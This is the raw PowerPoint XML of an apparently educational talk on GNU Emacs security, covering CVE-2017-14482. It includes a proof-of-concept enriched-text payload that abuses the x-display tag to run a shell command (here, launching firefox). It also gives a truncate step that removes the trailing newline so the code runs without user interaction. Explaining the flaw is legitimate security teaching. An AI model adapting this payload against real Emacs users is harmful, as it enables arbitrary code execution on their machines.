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74" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="271" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="275" r:id="rId11"/>
    <p:sldId id="26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/>
    <p:restoredTop sz="91509"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="10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19FD-C757-3B4F-8CAF-EA7174605FE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0A48-8608-F948-A5A7-DBB4727A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0A48-8608-F948-A5A7-DBB4727A7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5E4B-9E24-4444-A7EB-DFFCE4052B0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2A98-A98F-A845-B630-1A95BDC79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.teknik.io/Raw/gnU0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189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16365155/removing-a-newline-character-at-the-end-of-a-fi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xmlns="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xmlns="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xmlns="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xmlns="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715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Security Vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4600" dirty="0" smtClean="0"/>
              <a:t>GNU EMACS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Alexander Kellermann Nieves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26" y="0"/>
            <a:ext cx="4563374" cy="45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p.teknik.io/Raw/gnU0w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7639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703" y="26049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GNU EMACS?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free version of an EMACS style text editor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First version released in 1972</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Written in Lisp/C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“text editor”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19715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 Case of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text editor to edit remote / local files (TRAMP mode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually launched as a daemon `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="SF Mono" charset="0"/>
                <a:ea typeface="SF Mono" charset="0"/>
                <a:cs typeface="SF Mono" charset="0"/>
              </a:rPr>
              <a:t>emacs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="SF Mono" charset="0"/>
                <a:ea typeface="SF Mono" charset="0"/>
                <a:cs typeface="SF Mono" charset="0"/>
              </a:rPr>
              <a:t> --daemon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clients connect through `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>emacsclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> [options] [text file]`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typical Use case of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Used as an email reader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used as a calendar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Diary/Agenda?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IRC Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5691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/>
              <a:t>CVE-2017-14482</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="mr-I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vulnerability was present in the way GNU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Emacs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> handles “enriched text documents”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Automatic code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In some cases, the user will not even be prompted to download a file, if the poisoned file was in an email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RFC 1896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tools.ietf.org/html/rfc1896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7835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vulnerable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1" y="2589323"/>
            <a:ext cx="11453577" cy="2077271"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299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 to launch process from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073" y="2327564"/>
            <a:ext cx="1021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Content-Type: text/enriched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Text-Width: 70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&lt;x-display&gt;&lt;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&gt;(when (start-file-process-shell-command “scratch” nil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firefox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 nil)&lt;/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&gt;hacked&lt;/x-display&gt;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prevent user interaction with the x-display tags, we need to give rid of the EOL that exists in every file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are multiple ways to get this done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>truncate -s -1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[file]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stackoverflow.com/questions/16365155/removing-a-newline-character-at-the-end-of-a-file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5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stuff between the x-display tags is constantly evaluated as part of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> loop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2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252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Mangal</vt:lpstr>
      <vt:lpstr>SF Mono</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Security Vulnerabilities in GNU EMACS</vt:lpstr>
      <vt:lpstr>What is GNU EMACS?</vt:lpstr>
      <vt:lpstr>General Use Case of Emacs</vt:lpstr>
      <vt:lpstr> CVE-2017-14482 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Example of vulnerable code</vt:lpstr>
      <vt:lpstr>First attempt to launch process from Emacs</vt:lpstr>
      <vt:lpstr>Problem 1</vt:lpstr>
      <vt:lpstr>Problem 2</vt:lpstr>
      <vt:lpstr>Demo File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Vulnerabilities in Emacs</dc:title>
  <dc:creator>Alexander Kellermann</dc:creator>
  <cp:lastModifiedBy>Alexander Kellermann</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-12T02:47:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-04T15:26:24Z</dcterms:modified>
</cp:coreProperties>
</file>